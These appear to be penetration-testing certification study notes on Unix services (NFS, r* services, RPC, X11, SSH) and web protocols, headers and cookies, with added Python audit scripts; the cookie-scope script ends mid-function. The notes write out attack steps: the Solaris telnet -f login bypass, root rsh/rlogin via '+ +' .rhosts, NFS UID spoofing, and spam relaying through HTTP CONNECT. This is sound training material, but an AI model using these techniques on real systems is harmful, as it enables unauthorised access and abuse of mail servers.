F2 - Unix vulnerabilities
Recent or commonly-found Solaris vulnerabilities, and in particular those for which there is exploit code in the public
domain.
Solaris 10 and 11 impacted by Telnet -f client sequence.
The flaw meant that exploitation could occur if an existing user account name was supplied after the “-f” (e.g. bin),
and could be conducted through the command line with:
telnet -l -f<account> <host>
Recent or commonly-found Linux vulnerabilities, and in particular those for which there is exploit code in the public
domain.
Use of remote exploit code and local exploit code to gain root access to target host
Common post-exploitation activities
 exfiltrate password hashes
 crack password hashes
 check patch levels
 derive list of missing security patches
 reversion to previous state
F3 FTP
FTP access control
You can use the following configuration files in the /etc/ftpd directory to control access to the FTP server.
 ftpusers is used to list users who are denied access to the FTP server.
 ftphosts is used to allow or deny login from various hosts to various accounts on the FTP server.
 ftpaccess is the main FTP configuration file. The FTP server only reads the /etc/ftpd/ftpaccess file
if called with the -a option. When the ftpaccess file is used, all users must be members of a class to
be allowed access to the FTP server. You can specify many ftpaccess directives that apply only to a
particular class.
Anonymous access to FTP servers
Risks of allowing write access to anonymous users.
F4 - Sendmail / SMTP
Valid username discovery via EXPN and VRFY
iis6
Note above: HELO > MAIL FROM: > RCPT TO:
Awareness of recent Sendmail vulnerabilities; ability to exploit them if possible
Mail relay vulnerability
Mail relaying
F5 - Network File System (NFS)
NFS security: host level (exports restricted to particular hosts) and file level (by UID and GID).
 The /etc/exports file controls which file systems are exported to remote hosts and specifies options.
 An alternate way to mount an NFS share (as opposed to using mount command) from another machine is to add
a line to the /etc/fstab file.
Use of NFSv4 is recommended over other versions of NFS. NFSv4 security mechanisms are oriented towards
authenticating individual users, and not client machines as used in NFSv2 and NFSv3.
The NFS service runs on TCP port 2049. The rpcinfo utility can be used to determine whether any mountd and NFS
services are running on the host.
Access control is not possible for users, other than through file and directory permissions. In other words, once a file
system is exported via NFS, any user on any remote host connected to the NFS server can access the shared data. To
limit the potential risks, administrators often allow read-only access or squash user permissions to a common user
and group ID.
Wildcards should be used sparingly when exporting directories via NFS as it is possible for the scope of the wildcard
to encompass more systems than intended.
Mount access is achieved by the client machine attempting to attach to the server. The security for this is provided
by the /etc/exports file. This file lists the names or IP addresses for machines that are allowed to access a share
point. If the client's ip address matches one of the entries in the access list then it will be allowed to mount.
It is also possible to restrict access to the portmap service via TCP wrappers. Access to ports used by portmap,
rpc.mountd, and rpc.nfsd can also be limited by creating firewall rules with iptables.
The following command will retrieve the list of the exported folders for a given host.
If there are any files on the exported share that the user does not have permission to read, it might be possible to
trick the NFS server into believing that the user account trying to read the file is the owner of the file. This can be
achieved by performing UID (User ID) manipulation.
Use ls -la to get the current owner of the file, then create a local username of the same name. The UID can be changed
in the passwd file; then su to the new user and access the file.
Root squashing
The default behaviour when exporting a file system via NFS is to use root squashing. This sets the user ID of anyone
accessing the NFS share as the root user on their local machine to a value of the server's nfsnobody account. Never
turn off root squashing. This prevents someone using local root to change file permissions on the remote share.
Since the UID of the new user is the same as the UID of the file, the system will believe that this is the original
owner, so it is possible to read the contents of the file.
This works because the exported folder does not have the root_squash option set, which would map the UID and GID of
the user accessing the NFS folder to an anonymous UID/GID. For example, the root user ID of a host that is trying
to access a share is replaced by the user ID nobody on the NFS server to prevent escalation of privileges.
The root_squash option can be enabled or disabled from the following location:
vi /etc/exports
Nosuid and Noexec options.
Can be used in /etc/fstab
noexec — Prevents execution of binaries on mounted file systems. This is useful if the system is mounting a non-
Linux file system via NFS containing incompatible binaries.
nosuid — Disables set-user-identifier or set-group-identifier bits. This prevents remote users from gaining higher
privileges by running a setuid program.
File access through UID and GID manipulation.
Mount the remote filesystem, ls -la what you want to know. Unmount the filesystem, create the group and such
locally, su to that user, remount the filesystem, and you have access to all the things
If the passwd file is writable, then changing the UID of a non-privileged user to 0 gives that user root-level
access. To demonstrate this issue, the UID of the username service has been modified to 0, which is the UID of the
root user.
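As an added example (not from the original notes), a small Python audit of an /etc/exports file that flags the weaknesses described above: wildcard or missing client lists, no_root_squash, and writable exports without all_squash. The sample exports file is constructed.

```python
"""Audit /etc/exports for the risky NFS export settings discussed above.

Added example, not from the original notes. Parses exports(5)-style lines
and reports wildcard client scopes, no_root_squash, and writable exports
that trust remote UIDs one-to-one. SAMPLE_EXPORTS is constructed.
"""
import re
from dataclasses import dataclass

# Constructed sample file, not taken from a real host.
SAMPLE_EXPORTS = """\
# /etc/exports - constructed sample
/srv/share      192.168.0.0/24(rw,sync,root_squash)
/home           *(rw,no_root_squash)
/opt/readonly   10.0.0.5(ro) 10.0.0.6(ro)
/srv/world      (rw)
/srv/lab        *.lab.example.com(rw,sync)
"""

# One "client(options)" token per export line; "(rw)" with no client means every host.
CLIENT_RE = re.compile(r"([^(]*)(?:\((.*)\))?")


@dataclass
class ExportEntry:
    path: str
    clients: list  # list of (client, [options]) pairs


def parse_exports(text):
    """Return an ExportEntry for every non-comment, non-empty line."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop trailing comments
        if not line:
            continue
        path, *specs = line.split()
        clients = []
        for spec in specs:
            m = CLIENT_RE.fullmatch(spec)
            host = m.group(1) or "*"  # empty client list exports to the world
            opts = [o for o in (m.group(2) or "").split(",") if o]
            clients.append((host, opts))
        entries.append(ExportEntry(path, clients))
    return entries


def audit_entry(entry):
    """Return (severity, message) findings for one export line."""
    findings = []
    for host, opts in entry.clients:
        writable = "rw" in opts
        if "*" in host or "?" in host:
            # Wildcards can encompass more systems than intended.
            findings.append(("high" if writable else "medium",
                             f"{entry.path}: wildcard client '{host}' widens the export scope"))
        if "no_root_squash" in opts:
            # Remote root keeps UID 0 on the share: can chmod/chown anything.
            findings.append(("high",
                             f"{entry.path}: no_root_squash for {host} (remote root keeps UID 0)"))
        if writable and "all_squash" not in opts:
            # Remote UIDs are trusted as-is; a client can forge any non-root UID.
            findings.append(("low",
                             f"{entry.path}: rw for {host} without all_squash (remote UIDs trusted 1:1)"))
    return findings


def audit_exports(text):
    """Map each exported path to its findings (empty list means clean)."""
    return {entry.path: audit_entry(entry) for entry in parse_exports(text)}


if __name__ == "__main__":
    for path, findings in audit_exports(SAMPLE_EXPORTS).items():
        for severity, message in findings or [("ok", f"{path}: no findings")]:
            print(f"[{severity}] {message}")
```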
F6 - R* services
Berkeley r* service:
 access control (/etc/hosts.equiv and .rhosts) – .rhosts is local to the user profile as it is in the user's home directory.
/etc/hosts.equiv is system-wide and applies to everyone, while .rhosts is specific to the user (and is stored in
their home directory).
 trust relationships
When a user connects, the IP address is cross-referenced against .rhosts and the username is verified, but no
password is needed.
 rusers is part of RPC servers (TCP 111), if found running rusers -l hostname
 exec – TCP 512 (rexec – needs username -l and password -p)
 login – TCP 513 (rlogin – needs username -l)
 rwho – UDP 513 – Accessed by issuing rwho host
 shell – TCP 514 (rsh – needs login -l)
Impact of poorly-configured trust relationships.
Depending on the files that are stored in the exported folder it might be possible to obtain shell access via SSH or
RSH and Rlogin. Interesting files to examine are: authorized_keys and rhosts
Both files are hidden, so from the NFS folder issue ls -la.
The .rhosts file specifies which remote hosts or users can access a local account on the system. If the contents of the
.rhosts file are + + this means that it allows connections from any host on the network and from any
username.
The following commands will allow the root user of the system to connect on the target directly as the system will
not prompt for a password since all the users are trusted from all systems.
rsh -l root IP
rlogin -l root IP
F7 - X11
X Windows security and configuration; host-based vs. user-based access control.
X servers listen on TCP ports 6000+ (depending on the number of concurrent displays).
DISPLAY variable is basically 3 components:
<host>:<display>[.<screen>]
When DISPLAY is set to host:4, short for tcp/host:4, clients use TCP to connect to the server. The TCP port is
then 6000 plus the display number (in that case 6004).
When X forwarding is requested from an SSH server, the SSH server sets a $DISPLAY variable with the value
localhost:10.0. In addition, it starts listening on 127.0.0.1 port 6010.
Xorg listens on port 6000+n, where n is the display number.
xwd allows you to take screenshots of the display.
Xhost Authentication
Access based on host - The host-based access method consists of specifying a set of hosts that are authorised to
connect to the X display server. The xhost command is used with + and - to allow and deny X access from individual hosts.
The xhost command uses the /etc/X<D>.hosts files (D being the display number) that contain the X server authentication information.
Xauth Authentication
The Xauth command is in charge of managing the $HOME/.Xauthority file that keeps the authentication
information. This file contains one cookie for each X display the user can use.
F8 - RPC services
RPC service enumeration
The RPC portmapper is a server that converts RPC program numbers into TCP/IP (or UDP/IP) protocol port numbers.
Several interesting Unix daemons, such as Network Information Service+, Network File System, and Common
Desktop Environment, run as RPC services on dynamically assigned high ports. The portmapper service (aka rpcbind)
runs on port TCP/UDP 111 or 32771 and can be queried using rpcinfo to discover the available services and their port
number.
The Nmap documentation states that if portmapper is filtered, services can be identified directly using a Nmap scan
of high port ranges (TCP/UDP 32771-34000). RPC Grinding scan is done as part of an aggressive scan (-A) or can be
called explicitly with -sR.
# rpcinfo -p 192.168.0.50 (not -l)
In networks protected by firewalls and other mechanisms, access to the RPC portmapper service running on port 111
is often filtered. Therefore, determined attackers can scan high port ranges (UDP and TCP ports 32771 through
34000 on Solaris hosts) to identify RPC services that are open to direct attack.
You can run Nmap with the -sR option to identify RPC services listening on high ports if the portmapper is
inaccessible.
Common RPC services
# rpcinfo -p 192.168.0.50
program vers proto port service
100000 4 tcp 111 rpcbind
100000 4 udp 111 rpcbind
100024 1 udp 32772 status
100024 1 tcp 32771 status
100021 4 udp 4045 nlockmgr
100021 2 tcp 4045 nlockmgr
100005 1 udp 32781 mountd
100005 1 tcp 32776 mountd
100003 2 udp 2049 nfs
100011 1 udp 32822 rquotad
100002 2 udp 32823 rusersd
100002 3 tcp 33180 rusersd
Sprayd - rpc.sprayd is a server that records the packets sent by spray. Spray sends a one-way stream of packets to
host using RPC, and reports how many were received, as well as the transfer rate. The host argument can be either a
name or an Internet address.
Other RPC services: walld, ypbind (ypbind finds the server for NIS domains and maintains the NIS binding
information), status, nlockmgr and rquotad.
Recent or commonly-found RPC service vulnerabilities.
F9 - SSH
 Dsniff v2.3 contains a tool called sshmitm which is used to conduct MITM attacks on SSH1. The tool exploits a
vulnerability in the host key authentication phase. SSH2 is not susceptible to sshmitm. SSH2 prevents MITM
by server-host authentication (private keys), and stronger authentication for the client (public keys).
 SSHv1 was found to have a remote integer overflow vulnerability that allowed hackers to run code with root
access.
Versions 1 and 2 of the SSH protocol
 SSHv1 and SSHv2 will not talk to each other as the entire code was re-written (except for SSH v1.99).
 SSH servers that advertise themselves as 1.99 (e.g. SSH-1.99-OpenSSH_4.1) are really SSH-2 servers that are
configured to fall back to using SSH-1 if requested.
 However, if SSH 1.99 is reported, then both SSH 1.5 and SSH 2.0 are supported. SSH version 1.99 is merely an
indication that the server supports both SSH version 2 *and* SSH version 1.
SSH2 added a number of new features to provide a stronger, more comprehensive product. These features include:
 Encryption ciphers, such as 3DES and AES.
 The use of sound cryptographic Message Authentication Code (MAC) algorithms for integrity checking.
 Support for public key certificates.
Identify the types and versions of SSH software in use
ssh -V localhost or 127.0.0.1
-V Display the version number and exit.
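An added example, not from the original notes, that reads a server's banner and classifies it by the protocol versions described above (1.5, 1.99 with SSH-1 fallback, 2.0); the banners are constructed, and grab_banner() takes any binary stream so it runs offline.

```python
"""Read an SSH server banner and classify its protocol support.

Added example, not part of the original notes. The server speaks first,
sending 'SSH-<protoversion>-<softwareversion>' (RFC 4253); 1.99 means an
SSH-2 server that will fall back to SSH-1 on request. The banners below
are constructed.
"""
import io
import re

BANNER_RE = re.compile(r"^SSH-(\d+\.\d+)-(\S+)")


def grab_banner(stream, max_lines=20):
    """Return the first line starting with 'SSH-' from a binary stream.

    Servers may send other lines before the banner; RFC 4253 tells clients
    to ignore them, so we skip up to max_lines of preamble.
    """
    for _ in range(max_lines):
        line = stream.readline()
        if not line:
            break
        text = line.decode("ascii", "replace").rstrip("\r\n")
        if text.startswith("SSH-"):
            return text
    return None


def classify_banner(banner):
    """Map a banner to the protocol versions the server will negotiate."""
    m = BANNER_RE.match(banner or "")
    if not m:
        raise ValueError(f"not an SSH banner: {banner!r}")
    proto, software = m.groups()
    if proto == "1.99":
        protocols = {"1", "2"}   # SSH-2 server with SSH-1 fallback enabled
    elif proto.startswith("2."):
        protocols = {"2"}
    else:
        protocols = {"1"}        # 1.3 / 1.5: SSH-1 only
    return {
        "software": software,
        "protocols": protocols,
        "ssh1_fallback": protocols == {"1", "2"},
        # Any SSH-1 support is a finding: sshmitm-style MITM and the integer overflow above.
        "weak": "1" in protocols,
    }


def classify_stream(data):
    """Convenience wrapper: classify raw bytes as received from a server."""
    return classify_banner(grab_banner(io.BytesIO(data)))


# Constructed banners; "SSH-1.99-OpenSSH_4.1" is the example quoted above.
CONSTRUCTED_BANNERS = {
    "modern": b"SSH-2.0-OpenSSH_8.9p1\r\n",
    "fallback": b"Welcome to the lab host\r\nSSH-1.99-OpenSSH_4.1\r\n",
    "legacy": b"SSH-1.5-SomeSSH_1.2\r\n",
}

if __name__ == "__main__":
    for label, data in CONSTRUCTED_BANNERS.items():
        print(label, classify_stream(data))
```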
Authentication mechanisms within SSH
 Public/private key pairs for authentication - Generating an SSH key pair and adding the public key into the
list of authorized keys will allow a user to connect via SSH on the NFS server.
 Passwords
Appendix G: Web Technologies
G1 - Web Server Operation
How a web server functions in terms of the client/server architecture.
Concepts of virtual hosting and web proxies.
G2 - Web Servers & their Flaws
Common web servers and their fundamental differences and vulnerabilities associated with them:
IIS
IIS 5.0 shipped with Windows 2000, IIS6 shipped with Windows 2003, IIS7 shipped with 2008.
ISAPI filters are DLL files that can be used to modify and enhance the functionality provided by IIS. ISAPI filters always
run on an IIS server, filtering every request until they find one they need to process. The ability to examine and
modify both incoming and outgoing streams of data makes ISAPI filters powerful and flexible.
Apache (and variants)
 The Apache 2.0.x Win32 installation is shipped with a default script, /cgi-bin/test-cgi.bat, that allows an
attacker to execute commands on the Apache server (although it is reported that any .bat file could open
this vulnerability.) An attacker can send a pipe character with commands appended as parameters, which are
then executed by Apache.
 The mod_userdir module allows each user account on the server to have a personal website in the home
directory, accessible via a <server URL>/~username alias.
 Apache returns error 404 when a user account, whose personal site is requested, doesn’t exist; and it
returns error 403 when a website is not found in that user’s home folder. The errors generated expose valid
user account names on the server.
 Apache Chunk Handling – impacts Apache 1.3.23 (FreeBSD), 1.3.20 and 1.3.23, 24 (OpenBSD), Apache 1.3.12,
1.3.20, 1.3.22-24 (NetBSD) – Apache-Nosejob exploit script released.
Other Web Application Servers
 IBM WebSphere Application Server
 Oracle WebLogic Server is a Java EE application server
 Apple WebObjects
G3 - Web Enterprise Architectures
Design of tiered architectures.
Web applications are designed across three layers:
 Presentation tier
 Application tier
 Data tier
The concepts of logical and physical separation.
Differences between presentation, application and database layers.
Multi-layered architecture is a client–server architecture in which presentation, application processing, and data
management functions are physically separated. The most widespread use of multitier architecture is the three-tier
architecture.
G4 - Web Protocols
HTTP, HTTPS
HTTP Connect
telnet www.example.org 80
Trying 192.168.0.14…
Connected to 192.168.0.14.
Escape character is '^]'.
CONNECT maila.microsoft.com:25 HTTP/1.0
HTTP/1.0 200 Connection established
220 inet-imc-02.redmond.corp.microsoft.com Microsoft.com ESTMP Server
Note the two carriage returns above. Status 200 shows OK to connection. A failed connection will display 405 Method
Not Allowed, or diversion to a generic web page.
Can also use HTTP POST, in which case you specify http in connection attempt:
POST http://mail.microsoft.com:25 HTTP/1.0
HTTP GET can be used along with HOST header:
telnet www.example.org 80
Trying 192.168.0.14…
Connected to 192.168.0.14.
Escape character is '^]'.
GET / HTTP/1.1
HOST: mx4.sun.com:25
HELO .
MAIL FROM: spammer@alter.net
RCPT TO: targtet@unsuspecting.com
DATA
Subject: Look Ma!
.
HTTP Methods
HTTP 1.0
 GET
 POST - Although the URL can still be bookmarked, any parameters sent in the message body will be excluded
from the bookmark. These parameters will also be excluded from the various locations in which logs of URLs are
maintained and from the Referer header.
 HEAD - Functions in the same way as a GET request, except that the server should not return a message body in
its response. The server should return the same headers that it would have returned to the corresponding GET
request.
HTTP 1.1
 OPTIONS - asks the server to report the HTTP methods that are available for a particular resource.
 PUT
 DELETE
 CONNECT - used by proxy servers. Can be abused to establish connections with arbitrary hosts.
 TRACE - designed for diagnostic purposes. The server should return in the response body the exact contents of
the request message it received. This can be used to detect the effect of any proxy servers between the client
and server that may manipulate the request.
WebDAV: PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK
HTTP Header
 The Pragma header instructs the browser not to store the response in its cache.
 The Expires header indicates that the response content expired in the past and therefore should not be
cached. These instructions are frequently issued when dynamic content is being returned to ensure that
browsers obtain a fresh version of this content on subsequent occasions.
Pragma is the HTTP/1.0 implementation and cache-control is the HTTP/1.1 implementation of the same concept.
They both are meant to prevent the client (i.e. the browser and not a proxy) from caching the response. Older clients
may not support HTTP/1.1 which is why that header is still in use.
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-store" /> (Exam tries to confuse with No Cache)
HTTP Authentication
 Basic is a simple authentication mechanism that sends user credentials as a Base64-encoded string in a request
header with each message.
 NTLM is a challenge-response mechanism and uses a version of the Windows NTLM protocol.
 Digest is a challenge-response mechanism and uses MD5 checksums of a nonce with the user’s credentials.
All HTTP web methods and response codes.
GET, POST, PUT, DELETE, OPTIONS, TRACE, HEAD, CONNECT
1xx Informational responses
 100 Continue
 101 Switching Protocols
 102 Processing
 103 Early Hints
2xx Success
 200 OK
 201 Created
 202 Accepted
 203 Non-Authoritative Information (since HTTP/1.1)
 204 No Content
 205 Reset Content
 206 Partial Content (RFC 7233)
 207 Multi-Status (WebDAV; RFC 4918)
 208 Already Reported (WebDAV; RFC 5842)
 226 IM Used (RFC 3229)
3xx Redirection
 300 Multiple Choices
 301 Moved Permanently - Resource requested has been definitively moved to the URL given by the
Location headers
 302 Found - Temporarily moved to the URL given by the Location header
 304 Not Modified (RFC 7232)
 306 Switch Proxy
 307 Temporary Redirect (since HTTP/1.1)
 308 Permanent Redirect (RFC 7538)
4xx Client errors
 400 Bad Request
 401 Unauthorized - Similar to 403 Forbidden, but specifically for use when authentication is required and has
failed or has not yet been provided.
 402 Payment Required - Reserved for future use
 403 Forbidden
 404 Not Found
 405 Method Not Allowed
 406 Not Acceptable
 407 Proxy Authentication Required
 408 Request Timeout
 409 Conflict
 410 Gone
5xx Server errors
 500 Internal Server Error
 501 Not Implemented
 502 Bad Gateway
 503 Service Unavailable
 504 Gateway Timeout
 505 HTTP Version Not Supported
 506 Variant Also Negotiates (RFC 2295)
 507 Insufficient Storage (WebDAV; RFC 4918)
 508 Loop Detected (WebDAV; RFC 5842)
 510 Not Extended (RFC 2774)
 511 Network Authentication Required (RFC 6585)
HTTP Header Fields relating to security features
 X-Frame-Options - This header gives instructions to the browser if and when a page should be displayed as
part of another page (i.e. in an IFRAME). Allowing a page to be loaded inside an IFRAME opens up the risk of
a so-called Clickjacking attack. The X-Frame-Options header can be used with the following values: DENY,
SAMEORIGIN, ALLOW-FROM uri (where uri is your desired URI, including protocol handler). Unless your application
explicitly requires to be loaded inside an IFRAME you should set the header to DENY.
 Strict-Transport-Security - This header, often abbreviated as HSTS (HTTP Strict Transport Security), tells the
browser to enforce an HTTPS connection whenever a user tries to reach the site sending this header. All
major browsers support this feature and should: Only connect to the site via HTTPS, convert all HTTP
references on the site (e.g. JavaScript includes) to HTTPS and Refuse to load the website in case of errors
with the SSL certificate (e.g. Certificate expired, broken certificate chain, …). It is important to note that as
this header can only be set via an HTTPS response, the user therefore needs to connect to the site at least
once via HTTPS.
As the HSTS HTTP Header is only recognized when sent over an HTTPS connection, websites can still allow
users to interact with the website using HTTP, to allow compatibility with non-HTTPS user agents.
 X-XSS-Protection - The purpose of this header is to instruct the web browser to utilize its Cross-Site Scripting
protection.
 X-Content-Type-Options – The nosniff directive forces the browser to render the content in accordance with
the Content-Type header, and thereby stops the browser from performing content-sniffing to guess at the
type of content returned from the web server.
 Content-Security-Policy – The CSP is sent from the server to stipulate the location where scripts can be
loaded. It also stipulates the restrictions on those scripts, for example whether the eval() JS function can
be used.
The Content-Security-Policy (short CSP) is a flexible approach to specify which content in a site may be
executed and which not. One of the current problems is that the web browser does not know which sources
to trust and which not to trust, e.g. is a third-party JavaScript include from apis.google.com good or bad? The
only proper solution to this is source whitelisting, where the developer specifies legitimate resource
locations.
To enable CSP, you need to configure your web server to return the Content-Security-Policy HTTP header
(sometimes you will see mentions of the X-Content-Security-Policy header, but that's an older version and
you don't need to specify it anymore).
Alternatively, the <meta> element can be used to configure a policy, for example:
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*;
child-src 'none';">
A primary goal of CSP is to mitigate and report XSS attacks. XSS attacks exploit the browser's trust of the
content received from the server. Malicious scripts are executed by the victim's browser because the
browser trusts the source of the content, even when it's not coming from where it seems to be coming from.
CSP makes it possible for server administrators to reduce or eliminate the vectors by which XSS can occur by
specifying the domains that the browser should consider to be valid sources of executable scripts. A CSP
compatible browser will then only execute scripts loaded in source files received from those whitelisted
domains, ignoring all other script (including inline scripts and event-handling HTML attributes).
Example: A web site administrator wants to allow users of a web application to include images from any
origin in their own content, but to restrict audio or video media to trusted providers, and all scripts only to a
specific server that hosts trusted code.
Content-Security-Policy: default-src 'self'; img-src *; media-src media1.com media2.com; script-src userscripts.example.com
CORS – (Cross Origin Resource Sharing) CORS allows cross-domain HTTP data exchange, which means a page running at
origin A can send/receive data from a server at origin B. CORS is abundantly used in web applications where web fonts,
CSS, documents, and so on are loaded from different origins, which may not be of the origin where the resources are
actually stored.
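An added example, not from the original notes, that checks a response's security headers and parses its CSP the way a practitioner would before sign-off; the two header sets are constructed (the good one reuses the CSP policy above) and the HSTS minimum age is an assumed threshold.

```python
"""Audit the security-related response headers described above.

Added example, not from the original notes. Checks X-Frame-Options,
Strict-Transport-Security, X-Content-Type-Options and a parsed
Content-Security-Policy. Header sets are constructed; MIN_HSTS_AGE is an
assumed threshold, not a value from the notes.
"""
import re

MIN_HSTS_AGE = 15552000  # assumed minimum: 180 days in seconds

# Constructed: a weak response (legacy ALLOW-FROM, inline scripts, no HSTS/nosniff).
WEAK_HEADERS = {
    "X-Frame-Options": "ALLOW-FROM https://partner.example",
    "Content-Security-Policy": "default-src *; script-src 'self' 'unsafe-inline'",
    "X-XSS-Protection": "1; mode=block",
}

# Constructed: the corrected response, reusing the CSP example from the notes.
GOOD_HEADERS = {
    "X-Frame-Options": "DENY",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Content-Type-Options": "nosniff",
    "Content-Security-Policy": "default-src 'self'; img-src *; "
                               "media-src media1.com media2.com; "
                               "script-src userscripts.example.com",
}


def parse_csp(value):
    """Split a CSP into {directive: [sources]}.

    A repeated directive is ignored: browsers honour the first occurrence.
    """
    policy = {}
    for part in value.split(";"):
        tokens = part.split()
        if tokens and tokens[0].lower() not in policy:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def effective_sources(policy, directive):
    """Fetch directives such as script-src fall back to default-src."""
    return policy.get(directive, policy.get("default-src", []))


def audit_headers(headers):
    """Return a list of findings for a response header dict (names case-insensitive)."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    findings = []

    if h.get("x-frame-options", "").upper() not in ("DENY", "SAMEORIGIN"):
        findings.append("X-Frame-Options absent or not DENY/SAMEORIGIN: clickjacking risk")

    age = re.search(r"max-age=(\d+)", h.get("strict-transport-security", ""))
    if not age:
        findings.append("Strict-Transport-Security missing: browser will not enforce HTTPS")
    elif int(age.group(1)) < MIN_HSTS_AGE:
        findings.append("HSTS max-age shorter than the assumed minimum")

    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff missing: MIME sniffing possible")

    csp = h.get("content-security-policy")
    if csp is None:
        findings.append("Content-Security-Policy missing: no script source whitelist")
    else:
        scripts = effective_sources(parse_csp(csp), "script-src")
        if not scripts:
            findings.append("CSP defines neither script-src nor default-src")
        # Any of these lets scripts run from places the whitelist should exclude.
        for risky in ("'unsafe-inline'", "'unsafe-eval'", "*", "http:", "https:"):
            if risky in scripts:
                findings.append(f"CSP script sources allow {risky}: XSS mitigation weakened")
    return findings


if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK_HEADERS), ("good", GOOD_HEADERS)):
        print(label, audit_headers(hdrs) or ["no findings"])
```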
URL with Session Data
URL Authenticated Links: This approach is generally only used without authentication for things like password resets.
The unguessable link typically expires within a short period of time, and can only be used by someone already semi-
authenticated (i.e. the website already knows the email address to which the link was sent)
Even though developers use the "HttpOnly" session cookie, the above-mentioned leakages of session ID in URL and
page body nullify the effectiveness of "HttpOnly" flag.
Cookies
Set-Cookie Header. Set-Cookie header of the http responses from the web server contains Secure and
HttpOnly flags.
Expires sets a date until which the cookie is valid. This causes the browser to save the cookie to persistent storage,
and it is reused in subsequent browser sessions until the expiration date is reached. If this attribute is not set, the
cookie is used only in the current browser session.
Expires=<date> - The maximum lifetime of the cookie as an HTTP-date timestamp. If not specified, the cookie will
have the lifetime of a session cookie. A session is finished when the client is shut down meaning that session cookies
will get removed at that point.
If a cookie presents the “Max-Age” (which takes precedence over “Expires”) or “Expires” attribute, it will be considered
a persistent cookie and will be stored on disk by the web browser until the expiration time.
 Persistent cookies are stored in a text file on the client’s computer.
 Non-Persistent cookies are stored in RAM on the client and are destroyed when the browser is closed (also called
in-memory cookies).
 Session cookies are created when you create a session object.
 epcSession can be created without cookies, but that makes the URL look crappy.
Secure flag forces the browser to transmit cookies (hence different from HSTS which HTTPs entire connection) through an
encrypted channel such as HTTPS, which prevents eavesdropping, especially when an HTTPS connection is downgraded to
HTTP through tools such as SSLStrip and so on.
The syntax for this is as follows:
Set-Cookie: Name=Value; expires=Wednesday, 01-May-2014 12:45:10 GMT; Secure
In this HTTP header; Secure instructs the browser to transmit a cookie through a secure encrypted channel, thereby
encasing the session token in an encrypted barrier.
HttpOnly is a flag attached to cookies that instruct the browser not to expose the cookie through client-side scripts
(document.cookie and others). It disallows access to the cookie from any scripts.
The purpose of HttpOnly is to avoid spilling cookies when an XSS vulnerability exists: an attacker might still be able to
run their script, but the fundamental benefit of having an XSS vulnerability (the ability to steal cookies and hijack a
currently established session) is lost.
HttpOnly cookies were first introduced in Microsoft's Internet Explorer 6 SP1, and as of now, this has become a common
practice while setting session cookies. The syntax of this is as follows:
Set-Cookie: Name=Value; expires=Wednesday, 01-May-2014 12:45:10 GMT; HttpOnly
In this HTTP header; HttpOnly instructs the browser to save the cookie without exposing it to client-side scripts.
Cookie Domains – Whether the same cookie is sent to sub-domains depends on the cookie scope that is set. If server1.microsoft.com sets
the cookie, the web browser will automatically send the cookie with all subsequent requests to that domain and its
sub-domains (admin.server1.microsoft.com). The cookie will not be sent to the parent domain or peer domains
(microsoft.com or server2.microsoft.com).
This restriction can be over-ridden by a programmer by setting the domain attribute:
Set-cookie: cookie1=somedata; domain=microsoft.com;
This will ensure that cookies are sent to top-level domain as well as all sub-domains.
The site blog.example.com can set cookies with scope blog.example.com or with scope example.com. Cookies with
the latter scope will be sent back to secure.example.com, if the user visits secure.example.com.
If the site secure.example.com sets a cookie with scope example.com, then the site blog.example.com can
overwrite that cookie arbitrarily. Whenever browsers see a cookie with the same name and scope as one that's
already in the cookie jar, they discard the old cookie value and overwrite it with the new cookie. Thus,
blog.example.com can overwrite any cookie whose scope is example.com.
Cookie Path Restrictions – The same cookie is sent for a folder and its sub-folders, but not for other directories (including not the parent). If an
application residing at http://microsoft.com/app1/index.jsp sets a cookie, the browser will automatically send this cookie
with all requests for pages residing under the /app1/ directory and also any sub-directories. The browser will not include the
cookie with requests for any other directory on that server, including the parent directory.
This restriction can be over-ridden by a programmer by setting the path attribute:
Set-cookie: cookie1=somedata; path=/app1/
This will ensure that the cookie will only be sent to the application residing at the /app1/ directory and its sub-directories.
If the trailing / is not specified, the browser will send the cookie to all directories that begin with app1. For example,
/app1-test/ or /app1-prod/
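An added example, not from the original notes: it parses Set-Cookie headers, reports missing Secure/HttpOnly flags and persistently stored session tokens (Max-Age winning over Expires), and applies domain and path scope rules (as specified in RFC 6265) to decide whether a cookie reaches a given request. The headers are constructed; the first reuses the syntax shown above.

```python
"""Set-Cookie attribute audit and scope check.

Added example, not from the original notes. parse_set_cookie() splits a
header into name, value and attributes; audit_cookie() reports the flag
and lifetime issues described above; would_send() applies the RFC 6265
domain-match and path-match rules. SAMPLE_HEADERS are constructed.
"""
from dataclasses import dataclass, field


@dataclass
class Cookie:
    name: str
    value: str
    attrs: dict = field(default_factory=dict)  # attribute names lower-cased


# Constructed headers; the first follows the Set-Cookie syntax quoted above.
SAMPLE_HEADERS = [
    "Name=Value; expires=Wednesday, 01-May-2014 12:45:10 GMT; Secure",
    "SESSIONID=abc123; Domain=example.com; Path=/app1/; Secure; HttpOnly",
]


def parse_set_cookie(header):
    """Parse one Set-Cookie header value into a Cookie."""
    pairs = [p.strip() for p in header.split(";")]
    name, _, value = pairs[0].partition("=")
    cookie = Cookie(name.strip(), value.strip())
    for pair in pairs[1:]:
        key, _, val = pair.partition("=")  # flags like Secure have no value
        cookie.attrs[key.strip().lower()] = val.strip()
    return cookie


def lifetime_source(cookie):
    """Which attribute governs lifetime: Max-Age beats Expires; neither means session."""
    if "max-age" in cookie.attrs:
        return "max-age"
    if "expires" in cookie.attrs:
        return "expires"
    return "session"


def audit_cookie(cookie, session_token=True):
    """Return findings for one cookie; session_token marks it as an auth/session cookie."""
    findings = []
    if "secure" not in cookie.attrs:
        findings.append(f"{cookie.name}: missing Secure (sent over plain HTTP, e.g. after SSLStrip)")
    if "httponly" not in cookie.attrs:
        findings.append(f"{cookie.name}: missing HttpOnly (readable via document.cookie under XSS)")
    if session_token and lifetime_source(cookie) != "session":
        findings.append(f"{cookie.name}: session token stored persistently ({lifetime_source(cookie)})")
    return findings


def domain_matches(cookie_domain, host):
    """RFC 6265 domain-match: host equals the domain or is a sub-domain of it."""
    d = cookie_domain.lstrip(".").lower()
    host = host.lower()
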